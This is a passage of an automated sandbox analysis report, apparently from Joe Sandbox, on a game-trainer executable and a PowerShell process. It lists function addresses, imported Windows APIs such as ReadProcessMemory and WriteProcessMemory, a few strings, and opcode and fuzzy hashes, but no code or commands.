                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: memcpy$memset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                          • String ID:
                                                                          • API String ID: 1738635707-0
                                                                          • Opcode ID: 90702b10806ec90035e6f9983b6b7e09ddf27c14c661ce296dfff093e261c8fb
                                                                          • Instruction ID: 516cc8eb709faf82f15f9c740130441b9cf875d39e16137d5b98ceb58205fecf
                                                                          • Opcode Fuzzy Hash: 90702b10806ec90035e6f9983b6b7e09ddf27c14c661ce296dfff093e261c8fb
                                                                          • Instruction Fuzzy Hash: 4D51C079B19E8694FE14DB1DE4442B96B61AF48BD2F840631DB6D277E5DF3CE0428308
                                                                          Function 00007FF8B8F71D80 Relevance: 10.7, APIs: 7, Instructions: 153injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcess$Writefreememcpy$Read_invalid_parameter_noinfo_noreturnmalloc
                                                                          • String ID:
                                                                          • API String ID: 1560051262-0
                                                                          • Opcode ID: 5d09cd1697ce0e85060163274d83c08a82e2468e5510c7f618081edddadb3396
                                                                          • Instruction ID: 4335c6a066873b34c7863c881b02a490b78102f510df7f9ffa54721f86ba395e
                                                                          • Opcode Fuzzy Hash: 5d09cd1697ce0e85060163274d83c08a82e2468e5510c7f618081edddadb3396
                                                                          • Instruction Fuzzy Hash: 81616E39A19F8281FA518F19E8442A97B70FB85FD1F540136EB9D13B64CF3CE5868708
                                                                          Function 00007FF8B8F73F50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,00007FF8B8F736D9), ref: 00007FF8B8F73F5B
                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FF8B8F736D9), ref: 00007FF8B8F7401D
                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B8F736D9), ref: 00007FF8B8F7405D
                                                                            • Part of subcall function 00007FF8B8F74920: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B8F7103E), ref: 00007FF8B8F7493A
                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B8F736D9), ref: 00007FF8B8F74070
                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B8F740AD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: memcpy$Concurrency::cancel_current_taskXout_of_range@std@@_invalid_parameter_noinfo_noreturnmalloc
                                                                          • String ID: invalid vector subscript
                                                                          • API String ID: 225515916-1949860628
                                                                          • Opcode ID: a7de3c16eb63e3b623d02498fccd81339706b82cc1b6655b6c5c59361fd26349
                                                                          • Instruction ID: f995ba9a71133549c2d6159e357a07c6d20892a55a1fe7ec27918e4b506335c8
                                                                          • Opcode Fuzzy Hash: a7de3c16eb63e3b623d02498fccd81339706b82cc1b6655b6c5c59361fd26349
                                                                          • Instruction Fuzzy Hash: 2431C136B08E8581FA14DF6AA4041B9ABA0AB64BE1F184535DFAD07BD5CF3CE152C304
                                                                          Function 00007FF8B8F736E0 Relevance: 9.2, APIs: 6, Instructions: 249COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessReadmemcmp
                                                                          • String ID:
                                                                          • API String ID: 3176920756-0
                                                                          • Opcode ID: bcccaca4536aae3c17190eb64e39493890961a33e0c5a1b4d314fc494e5810b3
                                                                          • Instruction ID: 1a6be2fcf39311b0bed1782d3e420bcbf62dbb0a0ff282c976a575a43f1c7f25
                                                                          • Opcode Fuzzy Hash: bcccaca4536aae3c17190eb64e39493890961a33e0c5a1b4d314fc494e5810b3
                                                                          • Instruction Fuzzy Hash: 9CC17C3AB19E8599FB118F29D4402A87BA1FB58BC9F944131DB5D13B99CF3CD552C308
                                                                          Function 00007FF8B8F74200 Relevance: 7.6, APIs: 5, Instructions: 105processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: Module32$CreateFirstNextOpenProcessSnapshotToolhelp32memcmp
                                                                          • String ID:
                                                                          • API String ID: 3551813145-0
                                                                          • Opcode ID: ef27848728e57b00f54bf132d20fc1e322867d02a7ea20d45f5984dffdf8b1fe
                                                                          • Instruction ID: c34333724a9ab665a41338eb8017d202bf3c5b7389383023b201f0979c847ffd
                                                                          • Opcode Fuzzy Hash: ef27848728e57b00f54bf132d20fc1e322867d02a7ea20d45f5984dffdf8b1fe
                                                                          • Instruction Fuzzy Hash: 85415A36A08F8186E660CF15F844269BBA4FB987A1F458234DBDD43794EF3CD492C704
                                                                          Function 00007FF8B8F724A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite$free
                                                                          • String ID: AND NotAvailableInAutoshow=0
                                                                          • API String ID: 3251193346-2000189202
                                                                          • Opcode ID: 5dd114985b51e524ecdaeb4a6ee6680aac70342fb451392c15103262cd97a31d
                                                                          • Instruction ID: b1d899969b1b3c80c029e457fa1f0a62004dfc8bcf613ed5868df42b16026f78
                                                                          • Opcode Fuzzy Hash: 5dd114985b51e524ecdaeb4a6ee6680aac70342fb451392c15103262cd97a31d
                                                                          • Instruction Fuzzy Hash: 9A11B379A1AE8681FA958B49E8503A92B70FB88BC6F544436CB4E43725CF3DE546870C
                                                                          Function 00007FF8B8F73DD0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF8B8F72809), ref: 00007FF8B8F73E46
                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF8B8F72809), ref: 00007FF8B8F73E51
                                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8B8F72809), ref: 00007FF8B8F73E88
                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF8B8F72809), ref: 00007FF8B8F73EEC
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: free$MemoryProcessReadmalloc
                                                                          • String ID:
                                                                          • API String ID: 945422901-0
                                                                          • Opcode ID: 14e76d314a38f5860d661b66c69f591f3506736d51f1cf77ff05bd61f85d3f90
                                                                          • Instruction ID: ae54c3022adc783f72adc4a8fdde7eef3340e11589d9f06aaf8318412c928670
                                                                          • Opcode Fuzzy Hash: 14e76d314a38f5860d661b66c69f591f3506736d51f1cf77ff05bd61f85d3f90
                                                                          • Instruction Fuzzy Hash: A041793AB09F8595EA508F5AE4046A8AB61FB48FC5F994035EF8D03744DF7DD486C304
                                                                          Function 00007FF8B8F751B0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: e09f90a87769b6277c11b38b7254214313cb37ebbb0d261935752cdcce18699c
                                                                          • Instruction ID: 07f52c9e60fceb6146e4dd452203728bdb4bf9fac28b1db43d1d055a4fdaa5bb
                                                                          • Opcode Fuzzy Hash: e09f90a87769b6277c11b38b7254214313cb37ebbb0d261935752cdcce18699c
                                                                          • Instruction Fuzzy Hash: 3C113C36A04F418AEB10DF64E8542A837A4FB1D799F041A35EB6D47794DF3CD1A98344
                                                                          Function 00007FF8B8F714A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF8B8F714AB
                                                                            • Part of subcall function 00007FF8B8F74920: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B8F7103E), ref: 00007FF8B8F7493A
                                                                            • Part of subcall function 00007FF8B8F73B70: memcpy.VCRUNTIME140 ref: 00007FF8B8F73C75
                                                                            • Part of subcall function 00007FF8B8F73B70: memcpy.VCRUNTIME140 ref: 00007FF8B8F73C8F
                                                                            • Part of subcall function 00007FF8B8F73B70: memset.VCRUNTIME140 ref: 00007FF8B8F73CA4
                                                                            • Part of subcall function 00007FF8B8F73B70: memset.VCRUNTIME140 ref: 00007FF8B8F73CE7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: memcpymemset$Xlength_error@std@@malloc
                                                                          • String ID: Cost=0$string too long
                                                                          • API String ID: 2569986753-2966528296
                                                                          • Opcode ID: ad06fa48fd60ba2b4d54c49a69b272a0f8c7bc0fc8a353929bb8a211ab6cc02f
                                                                          • Instruction ID: 9e0fcc8accf9518402065db1aa3896643c7a8f6b2272432e5f27c1ff137b6aba
                                                                          • Opcode Fuzzy Hash: ad06fa48fd60ba2b4d54c49a69b272a0f8c7bc0fc8a353929bb8a211ab6cc02f
                                                                          • Instruction Fuzzy Hash: D2310639E29E8685FA419F18E8413696BB1FB98BC6F005235DB4D17361DF3CE186C708

                                                                          Executed Functions

                                                                          Function 00007FF848A5B996 Relevance: .5, Instructions: 455COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2706819064.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848a50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e85c60580f232b723654a2210b9e53055cec08c8f7ce57aa611e00c7b8b9af2e
                                                                          • Instruction ID: 6d8ee0dcbaec7b06f83f1391ab7ae38213a0efa3687429335b0a0163d8c20f71
                                                                          • Opcode Fuzzy Hash: e85c60580f232b723654a2210b9e53055cec08c8f7ce57aa611e00c7b8b9af2e
                                                                          • Instruction Fuzzy Hash: E3E1A63090DA4D8FEBA8EF28C8567F977D1FB58341F00426AE80DC7295DF7499858B86
                                                                          Function 00007FF848A5C75B Relevance: .4, Instructions: 429COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2706819064.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848a50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 877d4d7826d353e65c3d1929a979cf3b4df86faaf0d10217fc13af63f8269781
                                                                          • Instruction ID: 1c967e9a004622b4c5c822d4b8410c6ba2ffcd5ea86b6aadf731bd71d5738bac
                                                                          • Opcode Fuzzy Hash: 877d4d7826d353e65c3d1929a979cf3b4df86faaf0d10217fc13af63f8269781
                                                                          • Instruction Fuzzy Hash: 91E1963090DA4D8FEBA8EF28D8567F977D2FB54350F04822AD80DC7295DF7499818B82
                                                                          Function 00007FF848B209F2 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2707206943.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848b20000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1A_L
                                                                          • API String ID: 0-1522723599
                                                                          • Opcode ID: 6367d6cee3c82a15ce6d8c0172010ae9fb7005044f2ec97f96dcc48f4ae3e792
                                                                          • Instruction ID: aa099eb5e59b6eb47c8aca1601c378283702b139116f302d93915a6e986c3237
                                                                          • Opcode Fuzzy Hash: 6367d6cee3c82a15ce6d8c0172010ae9fb7005044f2ec97f96dcc48f4ae3e792
                                                                          • Instruction Fuzzy Hash: 14B14931A0DE854FDB99FB2C98589347BE1EF66344B4802FEC049CB1A3DA15EC06C786
                                                                          Function 00007FF848B20A2B Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2707206943.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848b20000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1A_L
                                                                          • API String ID: 0-1522723599
                                                                          • Opcode ID: d30c48c77d9a74769973a34c5b9653653df24f53bf3952b1942419faa404184b
                                                                          • Instruction ID: ea0c36a41fd44c54f97e7ce79fbd23e382916e0e8fc4c319e14f29cada90fcbb
                                                                          • Opcode Fuzzy Hash: d30c48c77d9a74769973a34c5b9653653df24f53bf3952b1942419faa404184b
                                                                          • Instruction Fuzzy Hash: 6D61D331A1CE498FEF98FA28D499A3537E1EF65304B5402ADC44AC7692DE21FC46C786
                                                                          Function 00007FF848B233D5 Relevance: .4, Instructions: 432COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2707206943.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848b20000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2d5a3d4a3fd6cd8c2bd4da98a8f7013e75668b22aee68273176a831448778dda
                                                                          • Instruction ID: 0ad852a57f2a4cb25a0c9db1c9d785c3484e834b87ce3241b26dff33970de470
                                                                          • Opcode Fuzzy Hash: 2d5a3d4a3fd6cd8c2bd4da98a8f7013e75668b22aee68273176a831448778dda
                                                                          • Instruction Fuzzy Hash: DCC14631D0EB8A5FE79AAB2C58595B9BBE0FF09394F4401FAD04DC71A3DB18A805C356
                                                                          Function 00007FF848A5F0F0 Relevance: .3, Instructions: 346COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2706819064.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848a50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1d65b71d8cf96abe1c9434e16d4f8d01930229c78f3406f041cf41f10a1c1ad8
                                                                          • Instruction ID: 79145d54f7862edcfa35ad692bcaf899048b37c084fc3fc2a21cec32da7f440d
                                                                          • Opcode Fuzzy Hash: 1d65b71d8cf96abe1c9434e16d4f8d01930229c78f3406f041cf41f10a1c1ad8
                                                                          • Instruction Fuzzy Hash: F2A13871E1DA498FEB58EB2898566B877E2FF99340F14017DE44DC32C2CE78AC428746
                                                                          Function 00007FF848A5C356 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2706819064.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848a50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1b2a92e203189630c16ba3565735fc217fb3b09cb6181e2f1783ed19b0b20f8b
                                                                          • Instruction ID: 8fc6be77e35ccad0c707736f2c954df4e98639a1e69c2e3a0a6ad8fe771eccbf
                                                                          • Opcode Fuzzy Hash: 1b2a92e203189630c16ba3565735fc217fb3b09cb6181e2f1783ed19b0b20f8b
                                                                          • Instruction Fuzzy Hash: F7A1B33050DA4D8FEBA8EF28D8567F977E1FB58350F00422AE84DC7295CB7499858B86
                                                                          Function 00007FF848A5BE24 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2706819064.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848a50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 366cd929337b09f32e5279e1c755e9440a108afac92b4b1584f042eba3569e9a
                                                                          • Instruction ID: 2dbfbc0119c07294ae02fc72cd14f3badba2ee8e4ced2a7b842a35cb5452f029
                                                                          • Opcode Fuzzy Hash: 366cd929337b09f32e5279e1c755e9440a108afac92b4b1584f042eba3569e9a
                                                                          • Instruction Fuzzy Hash: 31311B3081A64DCEFBB4EF15CC47BF97292FF41355F400139D94D86092DBB86A8ACA26
                                                                          Function 00007FF848A6169D Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2706819064.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848a50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6bb4b88692bb43ce9c4db99d1bcafbec2fae1d3a57c8ebf284e36e9c4db0df76
                                                                          • Instruction ID: 87fb29eb3d5fa975577fccf9ec94dd4cb13ba436a56cd40609971a7acb269122
                                                                          • Opcode Fuzzy Hash: 6bb4b88692bb43ce9c4db99d1bcafbec2fae1d3a57c8ebf284e36e9c4db0df76
                                                                          • Instruction Fuzzy Hash: F411265C84F6C55ED743B73818284B27FE4CE83265B0C09EBE0D8D60A7D688194AC35B
                                                                          Function 00007FF848A533B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2706819064.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848a50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                          • Instruction ID: a19e91e6c809789110cb4a04782ffc91e0bb12e5ef0e213b60216fbe1010daf8
                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                          • Instruction Fuzzy Hash: DC01843010CB0C4FDB44EF0CE051AA5B7E0FB85364F10052DE58AC3661DA22E882CB46
                                                                          Function 00007FF848A64201 Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2706819064.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848a50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 76ff5384644d9e354b265a4053df98738c9e86836947c021d6d00b9a4bbe4f9d
                                                                          • Instruction ID: 6fc757bac13bbe06e4cdaa656cea31f2e599b5990a082b59227b0332f2e31fda
                                                                          • Opcode Fuzzy Hash: 76ff5384644d9e354b265a4053df98738c9e86836947c021d6d00b9a4bbe4f9d
                                                                          • Instruction Fuzzy Hash: 92F02221A1EA8A5FE345E73C64152A43B92EB89790F1900F6C04CCB2C7CA18580583A6